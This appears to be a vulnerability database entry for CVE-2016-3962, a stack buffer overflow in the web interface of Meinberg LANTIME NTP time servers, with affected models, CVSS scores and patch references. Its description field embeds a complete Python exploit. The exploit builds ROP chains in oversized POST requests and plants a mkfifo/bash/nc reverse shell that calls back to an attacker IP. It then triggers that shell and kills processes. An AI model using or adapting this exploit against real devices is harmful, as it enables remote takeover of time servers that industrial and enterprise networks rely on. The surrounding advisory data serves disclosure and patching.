Details of VAR-201607-0010

ID

VAR-201607-0010

CVE

CVE-2016-3962

TITLE

plural Meinberg Runs on device firmware NTP Time Server Interface-based stack-based buffer overflow vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2016-003488

DESCRIPTION

Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request. Meinberg NTP Time Server is prone to multiple privilege-escalation and stack-based buffer-overflow vulnerabilities. Remote attackers can exploit these issues to execute arbitrary code in the context of the application or gain elevated privileges. Other attacks are also possible. The following products are affected : Meinberg IMS-LANTIME M3000 Version 6.0 and prior Meinberg IMS-LANTIME M1000 Version 6.0 and prior Meinberg IMS-LANTIME M500 Version 6.0 and prior Meinberg LANTIME M900 Version 6.0 and prior Meinberg LANTIME M600 Version 6.0 and prior Meinberg LANTIME M400 Version 6.0 and prior Meinberg LANTIME M300 Version 6.0 and prior Meinberg LANTIME M200 Version 6.0 and prior Meinberg LANTIME M100 Version 6.0 and prior Meinberg SyncFire 1100 Version 6.0 and prior Meinberg LCES Version 6.0 and prior. Meinberg IMS-LANTIME M3000 etc. are all NTP time servers of German Meinberg company. #!/usr/bin/python # # EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit # EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/ # # 271 - trigger notifications # 299 - copy user defined notifications # Kernel Version: 2.6.15.1 # System Version: 530 # Lantime configuration utility 1.27 # ELX800/GPS M4x V5.30p import socket import struct import telnetlib import sys import time if len(sys.argv) < 3: print "[-] <Host> <Callback IP> " exit(1) host = sys.argv[1] callback_ip = sys.argv[2] print "[+] exploiting Meinburg M400" port = 80 ################################################################### # # Copy user_defined_notification to /www/filetmp # Append reverse shell string to /file/tmp # csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) param = "A" * 0x2850 resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n" system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 #must have a listener setup to receive the callback connection on ip 192.168.60.232 # i.e. nc -v -l -p 4444 command = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo "{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;" >> /www/filetmp' msg = "button=" + "A"*10028 msg += struct.pack("I", system ) msg += struct.pack("I", exit ) msg += struct.pack("I", some_str ) msg += command + "\x00" resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close() time.sleep(1) ################################################################### # # Copy /www/filetmp to user_defined_notification # csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) param = "A" * 0x2850 resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n" send_cmd = 0x807ED88 system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 ret = 0x804CE65 #stack pivot stack_pivot = 0x8049488 msg = "button=" + "A" * 9756 msg += "B" * 28 msg += struct.pack("I", 0x7FFEE01A ) # ebp msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret msg += struct.pack("I", some_str - 0x100 ) # some place msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret msg += struct.pack("I", ret ) * (71/4) msg += struct.pack("I", send_cmd ) msg += struct.pack("I", exit ) msg += struct.pack("I", 0x80012111 ) # [eax + 0x60] msg += struct.pack("I", some_str ) # buffer msg += struct.pack("I", 0xffffffff ) # count msg += "E" * 120 msg += struct.pack("I", 0xB1E8B434 ) # ebx msg += struct.pack("I", some_str - 100 ) # esi msg += struct.pack("I", some_str - 100 ) # edi msg += struct.pack("I", some_str - 0x100 ) # ebp msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret msg += "A" * 100 resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close time.sleep(1) ################################################################### # # Trigger reverse shell # csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) param = "A" * 0x2850 resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n" send_cmd = 0x807ED88 system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 ret = 0x804CE65 #stack pivot stack_pivot = 0x8049488 msg = "button=" + "A" * 9756 msg += "B" * 28 msg += struct.pack("I", 0x7FFEE01A ) # ebp msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret msg += struct.pack("I", some_str - 0x100 ) # some place msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret msg += struct.pack("I", ret ) * (71/4) msg += struct.pack("I", send_cmd ) msg += struct.pack("I", exit ) msg += struct.pack("I", 0x800120f5 ) # [eax + 0x60] msg += struct.pack("I", some_str ) # buffer msg += struct.pack("I", 0xffffffff ) # count msg += "E" * 120 msg += struct.pack("I", 0xB1E8B434 ) # ebx msg += struct.pack("I", some_str - 100 ) # esi msg += struct.pack("I", some_str - 100 ) # edi msg += struct.pack("I", some_str - 0x100 ) # ebp msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret msg += "A" * 100 resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close() time.sleep(1) print "[+] cleaning up" ################################################################### # # Kill all mains that are hung-up # csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) param = "A" * 0x2850 resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n" system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 command = 'killall main' msg = "button=" + "A"*10028 msg += struct.pack("I", system ) msg += struct.pack("I", exit ) msg += struct.pack("I", some_str ) msg += command + "\x00" resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close() print "[+] enjoy"

Trust: 2.07

sources: NVD: CVE-2016-3962 // JVNDB: JVNDB-2016-003488 // BID: 91400 // VULHUB: VHN-92781 // PACKETSTORM: 137947

AFFECTED PRODUCTS

vendor:	meinberg	model:	lces	scope:	eq	version:	-	Trust: 1.0
vendor:	meinberg	model:	lantime m100	scope:	eq	version:	-	Trust: 1.0
vendor:	meinberg	model:	lantime m200	scope:	eq	version:	-	Trust: 1.0
vendor:	meinberg	model:	ims-lantime m3000	scope:	eq	version:	-	Trust: 1.0
vendor:	meinberg	model:	lantime m300	scope:	eq	version:	-	Trust: 1.0
vendor:	meinberg	model:	ntp server	scope:	lte	version:	6.0	Trust: 1.0
vendor:	meinberg	model:	ims-lantime m1000	scope:	eq	version:	-	Trust: 1.0
vendor:	meinberg	model:	lantime m400	scope:	eq	version:	-	Trust: 1.0
vendor:	meinberg	model:	lantime m600	scope:	eq	version:	-	Trust: 1.0
vendor:	meinberg	model:	syncfire 1100	scope:	eq	version:	-	Trust: 1.0
vendor:	meinberg	model:	ims-lantime m500	scope:	eq	version:	-	Trust: 1.0
vendor:	meinberg	model:	lantime m900	scope:	eq	version:	-	Trust: 1.0
vendor:	meinberg funkuhren	model:	ims-lantime m1000	scope:	-	version:	-	Trust: 0.8
vendor:	meinberg funkuhren	model:	ims-lantime m3000	scope:	-	version:	-	Trust: 0.8
vendor:	meinberg funkuhren	model:	ims-lantime m500	scope:	-	version:	-	Trust: 0.8
vendor:	meinberg funkuhren	model:	lantime m100	scope:	-	version:	-	Trust: 0.8
vendor:	meinberg funkuhren	model:	lantime m200	scope:	-	version:	-	Trust: 0.8
vendor:	meinberg funkuhren	model:	lantime m300	scope:	-	version:	-	Trust: 0.8
vendor:	meinberg funkuhren	model:	lantime m400	scope:	-	version:	-	Trust: 0.8
vendor:	meinberg funkuhren	model:	lantime m600	scope:	-	version:	-	Trust: 0.8
vendor:	meinberg funkuhren	model:	lantime m900	scope:	-	version:	-	Trust: 0.8
vendor:	meinberg funkuhren	model:	lces	scope:	-	version:	-	Trust: 0.8
vendor:	meinberg funkuhren	model:	ntp server	scope:	lt	version:	6.20.004	Trust: 0.8
vendor:	meinberg funkuhren	model:	syncfire 1100	scope:	-	version:	-	Trust: 0.8
vendor:	meinberg	model:	ntp server	scope:	eq	version:	6.0	Trust: 0.6

sources: JVNDB: JVNDB-2016-003488 // CNNVD: CNNVD-201606-551 // NVD: CVE-2016-3962

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2016-3962
value:	HIGH
Trust: 1.0
NVD:	CVE-2016-3962
value:	HIGH
Trust: 0.8
CNNVD:	CNNVD-201606-551
value:	HIGH
Trust: 0.6
VULHUB:	VHN-92781
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2016-3962
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
VULHUB:	VHN-92781
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2016-3962
baseSeverity:	HIGH
baseScore:	7.3
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	LOW
integrityImpact:	LOW
availabilityImpact:	LOW
exploitabilityScore:	3.9
impactScore:	3.4
version:	3.0
Trust: 1.8

sources: VULHUB: VHN-92781 // JVNDB: JVNDB-2016-003488 // CNNVD: CNNVD-201606-551 // NVD: CVE-2016-3962

PROBLEMTYPE DATA

problemtype:

CWE-119

Trust: 1.9

sources: VULHUB: VHN-92781 // JVNDB: JVNDB-2016-003488 // NVD: CVE-2016-3962

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 137947 // CNNVD: CNNVD-201606-551

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-201606-551

CONFIGURATIONS

sources: JVNDB: JVNDB-2016-003488

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-92781

PATCH

title:	Meinberg Security Advisory: [MBGSA-1604] WebUI and NTP	url:	https://www.meinbergglobal.com/english/news/meinberg-security-advisory-mbgsa-1604-webui-and-ntp.htm	Trust: 0.8
title:	Multiple Meinberg Product-based stack-based buffer overflow vulnerability fixes	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=62467	Trust: 0.6

sources: JVNDB: JVNDB-2016-003488 // CNNVD: CNNVD-201606-551

EXTERNAL IDS

db:	NVD	id:	CVE-2016-3962	Trust: 2.9
db:	ICS CERT	id:	ICSA-16-175-03	Trust: 2.5
db:	EXPLOIT-DB	id:	40120	Trust: 1.1
db:	JVNDB	id:	JVNDB-2016-003488	Trust: 0.8
db:	CNNVD	id:	CNNVD-201606-551	Trust: 0.7
db:	BID	id:	91400	Trust: 0.3
db:	PACKETSTORM	id:	137947	Trust: 0.2
db:	VULHUB	id:	VHN-92781	Trust: 0.1

sources: VULHUB: VHN-92781 // BID: 91400 // JVNDB: JVNDB-2016-003488 // PACKETSTORM: 137947 // CNNVD: CNNVD-201606-551 // NVD: CVE-2016-3962

REFERENCES

url:	https://ics-cert.us-cert.gov/advisories/icsa-16-175-03	Trust: 2.5
url:	https://www.exploit-db.com/exploits/40120/	Trust: 1.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3962	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3962	Trust: 0.8
url:	https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/	Trust: 0.1
url:	https://github.com/securifera/cve-2016-3962-exploit	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-3962	Trust: 0.1

sources: VULHUB: VHN-92781 // JVNDB: JVNDB-2016-003488 // PACKETSTORM: 137947 // CNNVD: CNNVD-201606-551 // NVD: CVE-2016-3962

CREDITS

Ryan Wincey

Trust: 0.3

sources: BID: 91400

SOURCES

db:	VULHUB	id:	VHN-92781
db:	BID	id:	91400
db:	JVNDB	id:	JVNDB-2016-003488
db:	PACKETSTORM	id:	137947
db:	CNNVD	id:	CNNVD-201606-551
db:	NVD	id:	CVE-2016-3962

LAST UPDATE DATE

2025-04-13T23:02:54.663000+00:00

SOURCES UPDATE DATE

db:	VULHUB	id:	VHN-92781	date:	2017-09-03T00:00:00
db:	BID	id:	91400	date:	2016-06-23T00:00:00
db:	JVNDB	id:	JVNDB-2016-003488	date:	2016-07-11T00:00:00
db:	CNNVD	id:	CNNVD-201606-551	date:	2016-07-04T00:00:00
db:	NVD	id:	CVE-2016-3962	date:	2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:	VULHUB	id:	VHN-92781	date:	2016-07-03T00:00:00
db:	BID	id:	91400	date:	2016-06-23T00:00:00
db:	JVNDB	id:	JVNDB-2016-003488	date:	2016-07-11T00:00:00
db:	PACKETSTORM	id:	137947	date:	2016-07-18T21:50:07
db:	CNNVD	id:	CNNVD-201606-551	date:	2016-06-24T00:00:00
db:	NVD	id:	CVE-2016-3962	date:	2016-07-03T14:59:03.477